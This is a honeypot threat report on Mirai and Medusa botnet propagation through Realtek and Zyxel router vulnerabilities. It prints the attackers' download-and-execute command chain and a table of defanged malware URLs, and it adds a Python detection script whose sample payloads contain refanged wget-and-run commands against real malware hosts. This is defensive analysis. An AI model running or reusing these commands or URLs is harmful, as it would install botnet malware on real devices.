A good understanding of active threats is necessary to achieve a good security posture. The following report presents the trends that currently emerge from the Internet background noise. The data come from two weeks of our honeypot logs.
Exploit of Realtek SDK vulnerability to propagate Mirai botnet
A command injection vulnerability was discovered in 2021 affecting some versions of Realtek Jungle SDK and allowing an unauthenticated attacker to execute arbitrary commands on the affected system. This vulnerability is tracked as CVE-2021-35394 and has a CVSSv3 score of 9.8 (critical).
Realtek microchips are sold and included in various IoT products and routers from different manufacturers all over the world.
These past couple of weeks, a surge in exploit attempts of CVE-2021-35394 has been observed on our honeypots with the aim of propagating the Mirai botnet, a self-replicating and automated malware.
22 IP addresses conducted these exploit attempts, targeting servers located in Pacific Asia and in Europe (see IoCs below). 80% of these exploit attempts come from IP addresses registered in the US, 6% in the Emirates and 5% in Vietnam. Almost 80% of the requests came from AS211252 Delis LLC.
If the exploit is successful, the attacker has the device run the following command chain, carried in the request:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget <URL>; chmod 777 *; sh <filename1>; tftp -g <IP address> -r <filename2>; chmod 777 *; sh <filename2>; rm -rf *.sh; history -c
This aims at:
- Changing into the first of /tmp, /var/run, /mnt, /root or / that can be entered
- Downloading <filename1> from the given URL with wget and running it with sh
- Downloading <filename2> over TFTP and running it the same way
- Deleting the downloaded scripts and clearing the shell history
The files in question are variants of Mirai.
Below are the URLs to retrieve the malware files contained in the web requests observed on our honeypots:
|URL contained in the web request|Additional information|
|---|---|
|http[:]//87.251.67[.]57/EkSgbins.sh|–|
|http[:]//103.186.147[.]155/bins/mips|–|
|http[:]//94.232.46[.]201/Sakura.sh|–|
|http[:]//46.3.112[.]133:808/download.sh|–|
|http[:]//22.214.171[.]124/jack5tr.sh|–|
|http[:]//170.64.182[.]9/bins/void.mpsl|–|
|http[:]//45.154.3[.]16/mpsl|–|
|http[:]//46.3.112[.]143/download.sh|–|
|http[:]//46.3.112[.]162/download.sh|–|
|http[:]//195.133.40[.]248/mpsl|–|
|http[:]//111.92.242[.]146/mpsl|–|
|http[:]//107.189.13[.]143/download.sh|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//143.198.217[.]16/bins/mpsl|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//45.148.116[.]40/bins/mips|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//47.87.241[.]156/bins/kgf.mips|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//84.54.50[.]104/mips|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//79.137.198[.]58/hiddenbin/boatnet.mips|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//79.137.198[.]58/hiddenbin/boatnet.x86_64|These URLs are known for downloading a Linux variant of Mirai.|
|http[:]//43.139.138[.]38/mpsl|Down at the time of writing|
|http[:]//109.206.240[.]148/bins/mp|Down at the time of writing|
|http[:]//64.93.80[.]146/mpsl|Down at the time of writing|
|http[:]//109.206.240[.]231/binS/botx.mpsl|Down at the time of writing|
These large-scale attacks are a concern for organizations, since IoT devices and routers are often overlooked when it comes to cybersecurity. These detections align with the cybersecurity community's recent observations of a global surge of attacks on Realtek products.
To prevent such attacks, it is important to apply vendors' updates as soon as they are available. A security tool such as TEHTRIS NTA will help you detect any compromise of your devices.
IoCs – IP addresses
Exploit of RCE vulnerability in Zyxel product
A high-risk vulnerability, disclosed at the end of 2020, affects Zyxel products and allows a remote attacker to execute arbitrary code. The vulnerability is due to an inadequate handling of HTTP requests in the zhttpd webserver. Zyxel is a Taiwanese manufacturer of modems, network switches, routers and Wi-Fi access points, among other things.
Threat actors still rely on this exploit and scan the internet for vulnerable devices. Over the past couple of weeks, one and the same web request, coming from over 80 IP addresses, has been observed:
The attacker aims at clearing the tmp directory, then downloading and executing the x.sh file from http[:]//163.123.143[.]126/x.sh. The file is very likely the one with SHA256 945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d, seen for the first time in December 2022 and potentially associated with the Linux Medusa botnet. Medusa has been around for years, and a new variant spotted in the wild is based on the leaked Mirai source code.
A quarter of the exploit attempts came from IP addresses registered in China; the other top countries of origin were India, Ukraine, Sweden and Australia.
To prevent a Zyxel device from being added to a botnet, update its firmware as soon as the vendor releases patches.
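Both the Realtek and the Zyxel observations above boil down to the same post-exploitation dropper chain: pick a writable directory, fetch a file over HTTP or TFTP, chmod 777 it, run it with sh, erase traces. The following Python script is an added example (not TEHTRIS code and not part of the original report) of how a honeypot or web-proxy log pipeline can score captured command payloads against those stages, extract and defang the fetch URLs, and match them against the IoC URLs printed in this report. The sample payloads are constructed: the first mirrors the Realtek command chain printed above with its placeholders filled from the first IoC URL, the second is reconstructed from the prose description of the Zyxel request (the report does not print that request), and the last two are benign controls. The stage names, the threshold of three stages, and the `example.invalid` host are assumptions of this example.

```python
import re

# Dropper URLs taken from the report's IoC table and text, kept defanged
# exactly as printed there (only the last dot of the host is bracketed).
KNOWN_DROPPER_URLS = {
    "http[:]//87.251.67[.]57/EkSgbins.sh",
    "http[:]//79.137.198[.]58/hiddenbin/boatnet.mips",
    "http[:]//107.189.13[.]143/download.sh",
    "http[:]//163.123.143[.]126/x.sh",
}


def refang(url: str) -> str:
    """Undo report-style defanging so indicators compare equal to raw payload URLs."""
    return url.replace("[:]", ":").replace("[.]", ".")


def defang(url: str) -> str:
    """Bracket every dot in the host so extracted URLs are safe to paste into a report."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return f"{scheme}[:]//{host.replace('.', '[.]')}{sep}{path}"


KNOWN_REFANGED = {refang(u) for u in KNOWN_DROPPER_URLS}

# One pattern per stage of the chain the report describes. Stage names are
# this example's own labels, not terminology from the report.
STAGE_PATTERNS = {
    "cd_writable_dir": re.compile(r"\bcd\s+/(?:tmp|var/run|mnt|root)?\s*(?:;|\|\||&&|$)"),
    "download": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "chmod_777": re.compile(r"\bchmod\s+777\b"),
    "execute_with_sh": re.compile(r"(?:^|[\s;|&])sh\s+\S+"),
    "cleanup": re.compile(r"\brm\s+-rf\b|\bhistory\s+-c\b"),
}
URL_RE = re.compile(r"https?://[^\s;'\"]+")
# tftp -g <host> -r <file>, the form used in the Realtek chain printed above.
TFTP_RE = re.compile(r"\btftp\s+-g\s+([^\s;]+)\s+-r\s+([^\s;]+)")


def analyze_payload(payload: str) -> dict:
    """Score one captured command payload and extract its fetch targets as IoCs."""
    stages = [name for name, pat in STAGE_PATTERNS.items() if pat.search(payload)]
    http_urls = URL_RE.findall(payload)
    tftp_urls = [f"tftp://{host}/{name}" for host, name in TFTP_RE.findall(payload)]
    fetched = http_urls + tftp_urls
    return {
        "stages": stages,
        "fetched_urls": [defang(u) for u in fetched],
        "known_ioc_hits": [defang(u) for u in http_urls if u in KNOWN_REFANGED],
        # Threshold is an assumption: three stages plus a real fetch target is
        # what separates a dropper chain from an ordinary wget or cd.
        "verdict": "dropper" if len(stages) >= 3 and fetched else "benign",
    }


def scan_payloads(payloads):
    """Return (index, analysis) for every payload judged to be a dropper chain."""
    results = ((i, analyze_payload(p)) for i, p in enumerate(payloads))
    return [(i, r) for i, r in results if r["verdict"] == "dropper"]


# Constructed sample payloads (see lead-in); not captured traffic.
SAMPLE_PAYLOADS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://87.251.67.57/EkSgbins.sh; chmod 777 *; sh EkSgbins.sh; "
    "tftp -g 87.251.67.57 -r EkSgbins.sh; chmod 777 *; sh EkSgbins.sh; "
    "rm -rf *.sh; history -c",
    "rm -rf /tmp/*; cd /tmp; wget http://163.123.143.126/x.sh; chmod 777 x.sh; sh x.sh",
    "cd /tmp && ls -la",
    "wget http://example.invalid/index.html",
]

if __name__ == "__main__":
    for idx, result in scan_payloads(SAMPLE_PAYLOADS):
        print(idx, result["verdict"], result["stages"])
        print("  fetched:", result["fetched_urls"])
        print("  known IoC hits:", result["known_ioc_hits"])
```

Matching on the chain rather than on a single URL is what keeps the rule useful after the hosting IPs in the table go down (as several already had at the time of writing): a new C2 still has to walk the same stages. The `known_ioc_hits` field is then a bonus that ties a hit back to this report's table for triage.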
Exploit D-Link routers (with IoCs – IP addresses)
Information remains TEHTRIS' sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assumes no responsibility for anyone's use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, express or implied, regarding the accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.